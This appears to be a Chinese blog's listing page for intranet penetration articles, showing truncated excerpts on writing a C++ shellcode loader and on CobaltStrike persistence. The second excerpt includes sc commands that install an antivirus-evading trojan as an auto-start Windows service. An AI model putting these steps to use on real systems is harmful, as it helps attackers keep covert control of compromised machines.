内网渗透
文章平均质量分 58
庸人自扰#7
这个作者很懒,什么都没留下…
展开
-
Shellcode执行工具编写思路(一)
Shellcode执行工具编写思路 之前在MS08067实验室发过,我寻思着自己可以做个技术分析的公众号,写写文章分析给大家琢磨,也可以提升一下自己的技术。 这是一段C++加载器的代码,代码来自倾旋大佬的博客,先看大佬给的注释。 #include<Windows.h> //入口函数 intwmain(intargc,TCHAR*argv[]){ intshellcode_size=0;// shellcode长度 DWORDdwThreadId;//原创 2021-05-10 15:26:55 · 429 阅读 · 0 评论 -
CobaltStrike 上线到权限维持
CobaltStrike 上线到权限维持 Win系统上常用计划任务或注册表自启动,或者 ”白+黑” 的方法来达到权限维持的目的 自启动服务 前情提要: 权限要求:system权限 准备免杀马子,上传自定义路径 sc create "GoGo" binpath= "C:\Users\Arks7\Desktop\BypassMM\Exp.exe(路径)" sc description "GoGo" "360SB" sc config "GoGo" start= auto net start "GoGo"原创 2021-05-10 15:20:51 · 1433 阅读 · 1 评论